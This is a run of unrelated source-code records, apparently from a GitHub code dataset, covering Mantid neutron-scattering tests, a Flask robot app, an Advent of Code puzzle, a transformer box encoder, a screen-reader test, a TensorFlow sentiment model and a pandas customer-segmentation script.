Gravity(False)\n Set2D()\n Detector(\"main-detector-bank\")\n Sample = LoadRaw('54431.raw')\n AssignSample(Sample,False)\n Can = LoadRaw('54432.raw')\n AssignCan(Can,False)\n LimitsWav(3,4, 0.2, 'LIN')\n TransFit('LOG',3.0,8.0)\n Sample_Trans = LoadRaw('54435.raw')\n Sample_Direct = LoadRaw('54433.raw')\n TransmissionSample(Sample_Trans, Sample_Direct, False)\n Can_Trans = LoadRaw('54434.raw')\n Can_Direct = LoadRaw('54433.raw')\n TransmissionCan(Can_Trans, Can_Direct, False)\n\n #run the reduction\n WavRangeReduction(3, 4, False, '_suff')\n\n def validate(self):\n self.disableChecking.append('SpectraMap')\n #when comparing LOQ files you seem to need the following\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n return '54431main_2D_3.0_4.0_suff','LOQTransFitWorkspace2D.nxs'\n\nclass LOQReductionOnLoadedWorkspaceMustProduceTheSameResult_1(stresstesting.MantidStressTest):\n \"\"\" It will repeat the test done at LOQCentreNoGrav but using \n loaded workspaces\n \"\"\"\n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n\n Set1D()\n Detector(\"rear-detector\")\n MaskFile('MASK.094AA')\n Gravity(False)\n Sample = LoadRaw('54431.raw')\n Trans_Sample = LoadRaw('54435.raw')\n Trans_Direct = LoadRaw('54433.raw')\n Can = LoadRaw('54432.raw')\n CanTrans_Sample = 
LoadRaw('54434.raw')\n CanTrans_Direct = LoadRaw('54433.raw')\n \n AssignSample(Sample, False)\n TransmissionSample(Trans_Sample, Trans_Direct, False)\n AssignCan(Can, False)\n TransmissionCan(CanTrans_Sample, CanTrans_Direct, False)\n \n FindBeamCentre(60,200, 9)\n \n WavRangeReduction(3, 9, DefaultTrans)\n \n def validate(self):\n return '54431main_1D_3.0_9.0','LOQCentreNoGravSearchCentreFixed.nxs'\n\nclass LOQReductionOnLoadedWorkspaceMustProduceTheSameResult_2(stresstesting.MantidStressTest):\n \"\"\"Before ticket #8461 test LOQReductionOnLoadedWorkspaceMustProduceTheSameResult_1 used\n to produce a workspace that matches LOQCentreNoGrav.nxs. This test is created to ensure\n that if we put the same centre that was produced before, we finish in the same result\n for the reduction\"\"\"\n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n\n Set1D()\n Detector(\"rear-detector\")\n MaskFile('MASK.094AA')\n Gravity(False)\n Sample = LoadRaw('54431.raw')\n Trans_Sample = LoadRaw('54435.raw')\n Trans_Direct = LoadRaw('54433.raw')\n Can = LoadRaw('54432.raw')\n CanTrans_Sample = LoadRaw('54434.raw')\n CanTrans_Direct = LoadRaw('54433.raw')\n \n SetCentre(324.765, 327.670)\n\n AssignSample(Sample, False)\n TransmissionSample(Trans_Sample, Trans_Direct, False)\n AssignCan(Can, False)\n TransmissionCan(CanTrans_Sample, CanTrans_Direct, False)\n \n WavRangeReduction(3, 9, DefaultTrans)\n\n def validate(self):\n # Need to disable checking of the Spectra-Detector map becauseit isn't\n # fully saved out to the nexus file (it's limited to the spectra that\n # are actually present in the saved workspace).\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n\n return '54431main_1D_3.0_9.0','LOQCentreNoGrav.nxs'\n \n\nclass SANSLOQCan2DReloadWorkspace(stresstesting.MantidStressTest):\n \n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\" \n LOQ()\n Set2D()\n Detector(\"main-detector-bank\")\n MaskFile('MASK.094AA')\n # apply some small artificial shift\n SetDetectorOffsets('REAR', -1.0, 1.0, 0.0, 0.0, 0.0, 0.0) \n Gravity(True)\n sample = Load('99630')\n can = Load('99631')\n AssignSample(sample, False)\n AssignCan(can, False)\n \n WavRangeReduction(None, None, False)\n\n \n def validate(self):\n # Need to disable checking of the Spectra-Detector map because it isn't\n # fully saved out to the nexus file (it's limited to the spectra that\n # are actually present in the saved workspace).\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Instrument')\n #when comparing LOQ files you seem to need the following\n self.disableChecking.append('Axes')\n # the change in number is because the run number reported from 99630 is 53615\n return '53615main_2D_2.2_10.0','SANSLOQCan2D.nxs'\n\nclass SANS2DFrontNoGravReloadWorkspace(stresstesting.MantidStressTest):\n \n def runTest(self):\n config[\"default.instrument\"] = \"SANS2D\"\n SANS2D()\n MaskFile('MASKSANS2D_094i_RKH.txt')\n SetDetectorOffsets('REAR', -16.0, 58.0, 0.0, 0.0, 0.0, 0.0)\n SetDetectorOffsets('FRONT', -44.0, -20.0, 47.0, 0.0, 1.0, 1.0)\n Gravity(False)\n Set1D()\n Sample = LoadNexus('2500')\n AssignSample(Sample, False)\n WavRangeReduction(4.6, 12.85, False)\n\n def validate(self):\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n return '2500front_1D_4.6_12.85','SANS2DFrontNoGrav.nxs'\n\nclass 
SANS2DWaveloopsReloadWorkspace(stresstesting.MantidStressTest):\n \n def runTest(self):\n config[\"default.instrument\"] = \"SANS2D\"\n SANS2D()\n MaskFile('MASKSANS2D.091A')\n Gravity(True)\n Set1D()\n s = Load('992')\n s_t = Load('988')\n direct = Load('987')\n direct_can = CloneWorkspace(direct)\n c = Load('993')\n c_t = Load('989') \n AssignSample(s,False)\n TransmissionSample(s_t, direct, False)\n AssignCan(c, False)\n TransmissionCan(c_t, direct_can, False)\n\n CompWavRanges([3, 5, 7, 11], False)\n \n def validate(self):\n self.disableChecking.append('SpectraMap')\n self.disableChecking.append('Axes')\n self.disableChecking.append('Instrument')\n # testing one of the workspaces that is produced, best not to choose the \n # first one in produced by the loop as this is the least error prone\n return '992rear_1D_7.0_11.0','SANS2DWaveloops.nxs'\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mantidproject/systemtests","sub_path":"SystemTests/AnalysisTests/SANS2DLOQReloadWorkspaces.py","file_name":"SANS2DLOQReloadWorkspaces.py","file_ext":"py","file_size_in_byte":12358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12539214792","text":"from .app import Flask\n\n\ndef register_blueprints(app):\n from DRcode.app.api import create_blueprint\n app.register_blueprint(create_blueprint(), url_prefix='/v1')\n\n\ndef create_global_var():\n import DRcode.app.libs.global_var as gl\n gl.set_value('state', 'WAITING')\n gl.set_value('stop', 0)\n gl.set_value('start', 0)\n gl.set_value('camera_open', False)\n gl.set_value('camera_connecting', True)\n gl.set_value('camera_ip', '')\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('DRcode.app.config.setting')\n app.config.from_object('DRcode.app.config.secure')\n register_blueprints(app)\n return app\n\n\ndef check_ps():\n return True\n # os.system('sudo pkill -f python3')\n # key_work = '\\\"sudo python3 /home/pi/DRrobot/DRrobot.py\\\"'\n # instruct = 'ps -aux | grep ' + key_work\n # key_line = os.popen(instruct).read()\n # ps_num = key_line[6:14].strip()\n # instruct = 'sudo kill -9' + ps_num\n # os.system(instruct)\n # # key_work = 'sudo python3'\n # instruct = 'sudo killall -9 sudo python3'\n # os.system('sudo killall -9 sudo python3')\n # os.system('nohup sudo python3 -u /home/pi/DRrobot/DRrobot.py >output.txt 2>&1 &')\n","repo_name":"fsmenyao/DRrobot","sub_path":"DRcode/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12576452465","text":"def parse_tiles(tiles):\n c = regex.compile(r\"^(e|se|sw|w|nw|ne)*$\")\n return c.match(tiles).captures(1)\n\n\nwith open(\"input\") as f:\n tiles_to_flip = list(map(parse_tiles, f.read().strip().split(\"\\n\")))\n\n\ndef calc_pos(tile):\n pos = [0, 0]\n for direction in tile:\n if direction == \"e\":\n pos[0] += 1\n pos[1] += 0\n elif direction == \"se\":\n pos[0] += 1\n pos[1] += 1\n elif direction == \"sw\":\n pos[0] += 0\n pos[1] += 1\n elif direction == \"w\":\n pos[0] += -1\n pos[1] += 0\n elif direction == \"nw\":\n pos[0] += -1\n pos[1] += -1\n elif direction == \"ne\":\n pos[0] += 0\n pos[1] += -1\n return tuple(pos)\n\n\nblack_tiles = set()\n\nfor tile in tiles_to_flip:\n pos = calc_pos(tile)\n if pos in black_tiles:\n black_tiles.remove(pos)\n else:\n black_tiles.add(pos)\n\nprint(len(black_tiles))\n\n\ndef get_neighbors(pos):\n neighbors = set()\n neighbors.add((pos[0] + 1, pos[1] + 1))\n neighbors.add((pos[0] + 0, pos[1] + 1))\n neighbors.add((pos[0] + 1, pos[1] + 0))\n neighbors.add((pos[0] + 0, pos[1] + -1))\n neighbors.add((pos[0] + -1, pos[1] + 0))\n neighbors.add((pos[0] + -1, pos[1] + -1))\n return neighbors\n\n\ndef flip_tiles(black_tiles):\n new_black_tiles = set()\n white_tiles_to_check = set()\n for black_tile in black_tiles:\n neighbors = get_neighbors(black_tile)\n black_neighbors = set()\n for n in neighbors:\n if n in black_tiles:\n black_neighbors.add(n)\n else:\n white_tiles_to_check.add(n)\n if len(black_neighbors) == 1 or len(black_neighbors) == 2:\n new_black_tiles.add(black_tile)\n for white_tile in white_tiles_to_check:\n neighbors = get_neighbors(white_tile)\n black_neighbors = neighbors.intersection(black_tiles)\n if len(black_neighbors) == 2:\n new_black_tiles.add(white_tile)\n\n return new_black_tiles\n\n\nfor x in range(100):\n black_tiles = flip_tiles(black_tiles)\n print(f\"Day {x + 1}: {len(black_tiles)}\")\n","repo_name":"alejandro-myriad/advent_of_code","sub_path":"2020/day24_alejandro/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"10244217174","text":"\"\"\"\nGPT model\n- the initial stem consists of a combination of token encoding and a positional encoding\n- the meat of it is a uniform sequence of Transformer blocks\n - each Transformer is a sequential combination of a 1-hidden-layer MLP block and a self-attention block\n - all blocks feed into a central residual pathway similar to resnets\n- the final decoder is a linear projection into a vanilla Softmax classifier\n\"\"\"\n\nimport math\nimport logging\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport numpy as np\nfrom ..builder import HEADS\n\nlogger = logging.getLogger(__name__)\n\n\nclass CausalSelfAttention(nn.Module):\n \"\"\"\n A vanilla multi-head masked self-attention layer with a projection at the end.\n It is possible to use torch.nn.MultiheadAttention here but I am including an\n explicit implementation here to show that there is nothing too scary here.\n \"\"\"\n\n def __init__(self,\n n_embd=512,\n n_head=8,\n block_size=100,\n attn_pdrop=0.1,\n resid_pdrop=0.1):\n super().__init__()\n assert n_embd % n_head == 0\n # key, query, value projections for all heads\n self.key = nn.Linear(n_embd, n_embd)\n self.query = nn.Linear(n_embd, n_embd)\n self.value = nn.Linear(n_embd, n_embd)\n # regularization\n self.attn_drop = nn.Dropout(attn_pdrop)\n self.resid_drop = nn.Dropout(resid_pdrop)\n # output projection\n self.proj = nn.Linear(n_embd, n_embd)\n # causal mask to ensure that attention is only applied to the left in the input sequence\n self.register_buffer(\"mask\", torch.tril(torch.ones(block_size, block_size))\n .view(1, 1, block_size, block_size))\n self.n_head = n_head\n\n def forward(self, x, layer_past=None):\n B, T, C = x.size()\n\n # calculate query, key, values for all heads in batch and move head forward to be the batch dim\n k = self.key(x).view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)\n q = self.query(x).view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)\n v = self.value(x).view(B, T, self.n_head, C // self.n_head).transpose(1, 2) # (B, nh, T, hs)\n\n # causal self-attention; Self-attend: (B, nh, T, hs) x (B, nh, hs, T) -> (B, nh, T, T)\n att = (q @ k.transpose(-2, -1)) * (1.0 / math.sqrt(k.size(-1)))\n att = att.masked_fill(self.mask[:,:,:T,:T] == 0, float('-inf'))\n att = F.softmax(att, dim=-1)\n att = self.attn_drop(att)\n y = att @ v # (B, nh, T, T) x (B, nh, T, hs) -> (B, nh, T, hs)\n y = y.transpose(1, 2).contiguous().view(B, T, C) # re-assemble all head outputs side by side\n\n # output projection\n y = self.proj(y)\n y = self.resid_drop(y)\n return y\n\n\nclass Block(nn.Module):\n \"\"\" an unassuming Transformer block \"\"\"\n\n def __init__(self,\n n_embd=512,\n n_head=8,\n block_size=100,\n attn_pdrop=0.1,\n resid_pdrop=0.1):\n super().__init__()\n self.ln1 = nn.LayerNorm(n_embd)\n self.ln2 = nn.LayerNorm(n_embd)\n self.attn = CausalSelfAttention(\n n_embd, n_head, block_size, attn_pdrop, resid_pdrop)\n self.mlp = nn.Sequential(\n nn.Linear(n_embd, 4 * n_embd),\n nn.GELU(),\n nn.Linear(4 * n_embd, n_embd),\n nn.Dropout(resid_pdrop),\n )\n\n def forward(self, x):\n x = x + self.attn(self.ln1(x))\n x = x + self.mlp(self.ln2(x))\n return x\n\n\n@HEADS.register_module()\nclass BboxEncoder(nn.Module):\n \"\"\" the full GPT language model, with a context size of block_size \"\"\"\n\n def __init__(self,\n n_layer=12,\n n_head=8,\n n_embd=512,\n bbox_cord_dim=4,\n bbox_max_num=512,\n embd_pdrop=0.1,\n attn_pdrop=0.1,\n resid_pdrop=0.1):\n 
super(BboxEncoder, self).__init__()\n\n # input embedding stem\n # self.tok_emb = nn.Embedding(vocab_size, n_embd)\n # self.pos_emb = nn.Parameter(torch.zeros(1, block_size, n_embd))\n self.bbox_embedding = nn.Sequential(\n nn.Linear(bbox_cord_dim, n_embd),\n nn.Linear(n_embd, n_embd),\n nn.Dropout(embd_pdrop)\n )\n \n # transformer \n self.blocks = nn.Sequential(\n *[Block(n_embd, n_head, bbox_max_num, \n attn_pdrop, resid_pdrop) for _ in range(n_layer)])\n\n # decoder head\n self.ln_f = nn.LayerNorm(n_embd)\n self.head = nn.Linear(n_embd, n_embd, bias=False)\n\n self.block_size = bbox_max_num\n self.apply(self._init_weights)\n\n logger.info(\"number of parameters: %e\", \n sum(p.numel() for p in self.parameters()))\n\n def get_block_size(self):\n return self.block_size\n\n def _init_weights(self, module):\n if isinstance(module, (nn.Linear, nn.Embedding)):\n module.weight.data.normal_(mean=0.0, std=0.02)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n\n def forward(self, xs):\n out = []\n for x in xs:\n bbox_num, bbox_dim = x.size()\n\n assert bbox_num <= self.block_size, \"Cannot forward, model block size is exhausted.\"\n\n # if x.is_cuda:\n # device = x.get_device()\n # else:\n # device = 'cpu'\n\n # if bbox_num >= self.block_size:\n # x = x[:,:self.block_size,:]\n # else:\n # zero_cat = torch.Tensor(\n # np.zeros([b,self.block_size-bbox_num,bbox_dim]), \n # dtype=np.float32, \n # device=device)\n # x = torch.cat((x,zero_cat),dim=1)\n # forward the GPT model\n x = x.unsqueeze(0)\n bbox_repr = self.bbox_embedding(x)\n print(\"bbox_repr, \", bbox_repr.max(), bbox_repr.min(), bbox_repr.mean(), bbox_repr.std())\n #bbox_repr --> [b, box_num, 512]\n x = self.blocks(bbox_repr)\n x = self.ln_f(x)\n logits = self.head(x)\n print(\"logits, \", logits.max(), logits.min(), logits.mean(), logits.std())\n out.append(logits.squeeze(0))\n return out\n","repo_name":"pengyu965/ChartDete","sub_path":"mmdet/models/roi_heads/bbox_encoding_transformer_old.py","file_name":"bbox_encoding_transformer_old.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
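A smoke test for the encoder above, assuming the module's relative import of HEADS resolves (i.e. it runs inside its mmdet-style package); the layer count and box counts are arbitrary assumptions. Each input is a (num_boxes, 4) tensor of box coordinates, and each output is a (num_boxes, n_embd) feature matrix.

import torch

enc = BboxEncoder(n_layer=2, n_head=8, n_embd=512)
# Two "images" with 7 and 3 boxes, each box a 4-dim coordinate vector.
boxes = [torch.rand(7, 4), torch.rand(3, 4)]
outs = enc(boxes)
print([o.shape for o in outs])  # [torch.Size([7, 512]), torch.Size([3, 512])]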
+{"seq_id":"36672006509","text":"#!/usr/bin/python\n\n\"\"\"Test of radio button output using Firefox.\n\"\"\"\n\nfrom macaroon.playback import *\nimport utils\n\nsequence = MacroSequence()\n\n########################################################################\n# We wait for the focus to be on a blank Firefox window.\n#\nsequence.append(WaitForWindowActivate(utils.firefoxFrameNames, None))\n\n########################################################################\n# Open the \"File\" menu and press P for the Print dialog\n#\nsequence.append(utils.StartRecordingAction())\nsequence.append(KeyComboAction(\"f\"))\nsequence.append(PauseAction(3000))\nsequence.append(KeyComboAction(\"p\"))\nsequence.append(PauseAction(3000))\n\n########################################################################\n# Press Alt A to jump to the radio button group\n#\nsequence.append(utils.StartRecordingAction())\nsequence.append(KeyComboAction(\"a\"))\nsequence.append(utils.AssertPresentationAction(\n \"Alt a to radio button group\",\n [\"BRAILLE LINE: '\" + utils.firefoxAppNames + \" Application Print Dialog TabList General Page Range &=y All Pages RadioButton'\",\n \" VISIBLE: '&=y All Pages RadioButton', cursor=1\",\n \"SPEECH OUTPUT: 'Range All Pages selected radio button'\"]))\n\n########################################################################\n# Do a basic \"Where Am I\" via KP_Enter. \n#\nsequence.append(utils.StartRecordingAction())\nsequence.append(KeyComboAction(\"KP_Enter\"))\nsequence.append(PauseAction(3000))\nsequence.append(utils.AssertPresentationAction(\n \"Basic Where Am I\", \n [\"BRAILLE LINE: '\" + utils.firefoxAppNames + \" Application Print Dialog TabList General Page Range &=y All Pages RadioButton'\",\n \" VISIBLE: '&=y All Pages RadioButton', cursor=1\",\n \"SPEECH OUTPUT: 'Range All Pages radio button selected 1 of 4.'\",\n \"SPEECH OUTPUT: 'Alt a'\"]))\n\n########################################################################\n# Dismiss the dialog by pressing Escape and wait for the location bar\n# to regain focus.\nsequence.append(KeyComboAction(\"Escape\"))\nsequence.append(WaitForFocus(acc_role=pyatspi.ROLE_ENTRY))\n\n# Just a little extra wait to let some events get through.\n#\nsequence.append(PauseAction(3000))\n\nsequence.append(utils.AssertionSummaryAction())\n\nsequence.start()\n","repo_name":"h4ck3rm1k3/orca-sonar","sub_path":"test/keystrokes/firefox/xul_role_radio_button.py","file_name":"xul_role_radio_button.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"6793132961","text":"# https://stackoverflow.com/questions/8955448/save-load-scipy-sparse-csr-matrix-in-portable-data-format\n# https://machinelearningmastery.com/sparse-matrices-for-machine-learning/\n# https://sparse.pydata.org/en/latest/generated/sparse.COO.html#sparse.COO\n'''\n Various utils\n'''\nimport time\n\nimport numpy as np\nimport sparse\n\n\ndef now():\n return str(time.strftime('%Y-%m-%d %H:%M:%S'))\n\n\ndef get_line_count(file):\n cnt = 0\n with open(file) as fin:\n for _ in fin:\n cnt += 1\n return cnt\n\n\ndef json_serializer(o):\n '''\n json serializer that handles numpy int\n '''\n if isinstance(o, np.int64): return int(o)\n raise TypeError\n\n\n# get all pairs from a list\ndef enumerate_all_pairs(items):\n \"\"\"Make all unique pairs (order doesn't matter)\"\"\"\n pairs = []\n nitems = len(items)\n for i, wi in enumerate(items):\n for j in range(i + 1, nitems):\n pairs.append((wi, items[j]))\n return pairs\n\n\n# def i2w(s):\n# return [vocab[i] for i in s]\n\ndef flatten(list):\n r_list = []\n for sublist in list:\n r_list.extend(sublist)\n return r_list\n\n\n# from scipy.sparse import lil_matrix\n\n\ndef list_to_sparse_dict(target_list):\n x = np.array(target_list)\n s = sparse.COO(x)\n result = {\n \"dtype\": s.dtype.str,\n \"shape\": s.shape,\n \"data\": s.data.tolist(),\n \"coords\": s.coords.tolist()\n }\n return result\n\n\ndef array_from_sparse_dict(sparse_dict):\n coords = np.array(sparse_dict['coords'])\n data = np.array(sparse_dict['data'])\n # dtype = sparse_dict['dtype']\n shape = tuple(sparse_dict['shape'])\n s = sparse.COO(coords=coords, data=data, shape=shape)\n array = s.todense()\n return array\n","repo_name":"zhw12/AlgMap","sub_path":"common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"}
+{"seq_id":"7372844027","text":"import tensorflow as tf\nimport numpy as np\nimport glob #this will be useful when reading reviews from file\nimport os\nimport tarfile\nimport re\nimport math\n\nbatch_size = 50\nstrip_special_chars = re.compile(\"[^A-Za-z0-9 ]+\")\nmaxColumn = 40\n\nnumClasses = 2\ndata = []\ndef cleanSentences(string):\n stopwords=[\"a\", \"an\", \"and\", \"are\", \"as\", \"at\", \"be\", \"but\", \"by\", \"for\",\"from\",\"if\", \"in\", \"into\", \"is\", \"it\",\n \"no\", \"not\", \"of\", \"on\", \"or\", \"such\",\n \"that\", \"the\", \"their\", \"then\", \"there\", \"these\",\n \"they\", \"this\", \"to\", \"was\", \"will\", \"with\"]\n words = [w.replace(w, '') if w in stopwords else w for w in string.split()]\n string = ' '.join(words)\n string = string.lower().replace(\" \", \" \")\n #REMOVE STOP WORDS\n return re.sub(strip_special_chars, \"\", string.lower())\n\ndef load_data(glove_dict):\n \"\"\"\n Take reviews from text files, vectorize them, and load them into a\n numpy array. Any preprocessing of the reviews should occur here. The first\n 12500 reviews in the array should be the positive reviews, the 2nd 12500\n reviews should be the negative reviews.\n RETURN: numpy array of data with each row being a review in vectorized\n form\"\"\"\n global data\n folders=['pos','neg']\n\n maxReviews = 12500\n count=0\n if not (os.path.isdir(folders[0]) and os.path.isdir(folders[1])):\n tar = tarfile.open(\"reviews.tar\")\n tar.extractall()\n tar.close()\n for folder in folders:\n for element in os.listdir(folder):\n with open(folder + '/'+element,'r',encoding=\"utf-8\") as file:\n review = [glove_dict[word] for word in cleanSentences(file.read()).split() if word in glove_dict][:maxColumn]\n if len(review) < maxColumn:\n review.extend([0]*(maxColumn - len(review)))\n data.append(review)\n data = np.array(data)\n return data\n\n\ndef load_glove_embeddings():\n \"\"\"\n Load the glove embeddings into a array and a dictionary with words as\n keys and their associated index as the value. Assumes the glove\n embeddings are located in the same directory and named \"glove.6B.50d.txt\"\n RETURN: embeddings: the array containing word vectors\n word_index_dict: a dictionary matching a word in string form to\n its index in the embeddings array. e.g. {\"apple\": 119\"}\n \"\"\"\n #data = open(\"glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n #if you are running on the CSE machines, you can load the glove data from here\n #data = open(\"/home/cs9444/public_html/17s2/hw2/glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n word_index_dict={};\n embeddings=[];\n temp=[];\n i=0\n with open(\"glove.6B.50d.txt\",'r',encoding=\"utf-8\") as file:\n for line in file:\n temp = line.strip().split(\" \",1)\n embeddings.append(np.fromstring(temp[1], dtype=np.float32, sep=' '))\n word_index_dict[temp[0]]=i\n i=i+1\n embeddings.append(np.array([0] * 50,dtype=np.float32))\n word_index_dict['UNK']=len(embeddings)-1\n return np.array(embeddings), word_index_dict\n\n\ndef define_graph(glove_embeddings_arr):\n \"\"\"\n Define the tensorflow graph that forms your model. You must use at least\n one recurrent unit. The input placeholder should be of size [batch_size,\n 40] as we are restricting each review to it's first 40 words. 
The\n following naming convention must be used:\n Input placeholder: name=\"input_data\"\n labels placeholder: name=\"labels\"\n accuracy tensor: name=\"accuracy\"\n loss tensor: name=\"loss\"\n\n RETURN: input placeholder, labels placeholder, optimizer, accuracy and loss\n tensors\"\"\"\n\n #data = glove_embeddings_arr\n lstmUnits = 64\n tf.reset_default_graph()\n labels = tf.placeholder(tf.float32, [batch_size, numClasses],name=\"labels\")\n input_data = tf.placeholder(tf.int32, [batch_size, maxColumn], name=\"input_data\")\n datax = tf.Variable(tf.zeros([batch_size, maxColumn,50]),dtype=tf.float32)\n datax = tf.nn.embedding_lookup(glove_embeddings_arr,input_data)\n dropout_keep_prob = tf.placeholder_with_default(1.0, shape=())\n with tf.device('/cpu:0'):\n lstmCell = tf.contrib.rnn.BasicLSTMCell(lstmUnits)\n\n lstmCell = tf.contrib.rnn.DropoutWrapper(cell=lstmCell, output_keep_prob=dropout_keep_prob)\n value, state = tf.nn.dynamic_rnn(lstmCell, datax, dtype=tf.float32)\n weight = tf.Variable(tf.truncated_normal([lstmUnits, numClasses]))\n bias = tf.Variable(tf.constant(0.1, shape=[numClasses]))\n value = tf.transpose(value, [1, 0, 2])\n last = tf.gather(value, int(value.get_shape()[0]) - 1)\n prediction = (tf.matmul(last, weight) + bias)\n correctPred = tf.equal(tf.argmax(prediction,1), tf.argmax(labels,1))\n accuracy = tf.reduce_mean(tf.cast(correctPred, tf.float32),name=\"accuracy\")\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=labels))\n #optimizer = tf.train.GradientDescentOptimizer(0.25).minimize(loss)\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n return input_data, labels, dropout_keep_prob, optimizer, accuracy, loss\n","repo_name":"avinash2fly/Sentiment-Analysis-on-IMDB-dataset","sub_path":"implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
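A hedged sketch of driving the graph above with a TF1-style session; `get_batch` is a hypothetical helper (not in the original file) that would slice random (reviews, one-hot labels) batches out of the loaded data:

import tensorflow as tf

glove_array, glove_dict = load_glove_embeddings()
training_data = load_data(glove_dict)
input_data, labels, keep_prob, optimizer, accuracy, loss = define_graph(glove_array)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for step in range(1000):
        # batch_y must be one-hot with shape [batch_size, numClasses]
        batch_x, batch_y = get_batch(training_data, batch_size)  # hypothetical batching helper
        feed = {input_data: batch_x, labels: batch_y, keep_prob: 0.75}
        _, batch_loss, batch_acc = sess.run([optimizer, loss, accuracy], feed_dict=feed)
        if step % 50 == 0:
            print(step, batch_loss, batch_acc)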
+{"seq_id":"39832762153","text":"import datetime as dt\nimport pandas as pd\npd.set_option('display.max_columns', None)\n# pd.set_option('display.max_rows', None)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\ndf_ = pd.read_csv(\"/Users/birsenbayat/Desktop/miuul/PythonProgrammingForDataScience/CRM_Analitigi/FLOMusteriSegmentasyonu/flo_data_20k.csv\")\ndf = df_.copy()\n\n\ndf.head()\n\n#First look at data\n\ndf.head(10)\ndf.columns\ndf.shape\ndf.describe().T\ndf.isnull().sum()\ndf.dtypes\n\n#Omnichannel customers shop both online and offline platforms.\n#We create new variables for the total number of purchases and spending of each customer.\n\ndf[\"order_num_total\"] = df[\"order_num_total_ever_online\"] + df[\"order_num_total_ever_offline\"]\ndf[\"customer_value_total\"] = df[\"customer_value_total_ever_online\"] + df[\"customer_value_total_ever_offline\"]\n\ndf.head()\n\n#By examining the variable types, we convert the type of variables that express date to date.\ndf.dtypes\ndf[\"first_order_date\"] = df[\"first_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date\"] = df[\"last_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date_online\"] = df[\"last_order_date_online\"].apply(pd.to_datetime)\ndf[\"last_order_date_offline\"] = df[\"last_order_date_offline\"].apply(pd.to_datetime)\n\n#Let's look at the distribution of the number of customers in the shopping channels, the total number of products purchased, and the total expenditures.\nanalysing = df.groupby(\"order_channel\").agg({\"master_id\": \"count\",\n \"order_num_total\": \"sum\",\n \"customer_value_total\": \"sum\"})\n\n\n#Let's list the top 10 customers with the most revenue.\ndf.sort_values(by=\"customer_value_total\", ascending=False).head(10)\n\n#Let's list the top 10 customers with the most orders.\ndf.sort_values(by=\"order_num_total\", ascending=False).head(10)\n\n#Let's functionalize the data preparation process.\n\ndef dataset_preparing(dataframe):\n dataframe.dropna(inplace=True)\n dataframe[\"order_num_total\"] = dataframe[\"order_num_total_ever_online\"] + dataframe[\"order_num_total_ever_offline\"]\n dataframe[\"customer_value_total\"] = dataframe[\"customer_value_total_ever_online\"] + dataframe[\"customer_value_total_ever_offline\"]\n\n dataframe[\"first_order_date\"] = dataframe[\"first_order_date\"].apply(pd.to_datetime)\n dataframe[\"last_order_date\"] = dataframe[\"last_order_date\"].apply(pd.to_datetime)\n dataframe[\"last_order_date_online\"] = dataframe[\"last_order_date_online\"].apply(pd.to_datetime)\n dataframe[\"last_order_date_offline\"] = dataframe[\"last_order_date_offline\"].apply(pd.to_datetime)\n\n return dataframe\n\n#using function for data preparation\ndf = df_.copy()\ndf.head()\ndataset_preparing(df)\n\n#Calculating RFM Metrics\n#Step 1: We will define Recency, Frequency and Monetary.\n#Step 2: We will assign the metrics you calculated to a variable named rfm.\n\ndf[\"last_order_date\"].max() #we will find the last date ordered and decide on the analysis date.\n\ntoday_date = dt.datetime(2021, 6, 2)\n\nrfm = df.groupby(\"master_id\").agg({\"last_order_date\": lambda x: (today_date - x.max()).days,\n \"order_num_total\": \"sum\",\n \"customer_value_total\": \"sum\"})\n\nrfm.columns = [\"recency\", \"frequency\", \"monetary\"]\nrfm.head()\n\n#Calculation of RF Score\n#Step 1: We will convert the Recency, Frequency and Monetary metrics to scores between 1-5 with the help of qcut.\n\nrfm[\"recency_score\"] = pd.qcut(rfm[\"recency\"], 5, labels = [5, 4, 3, 2, 
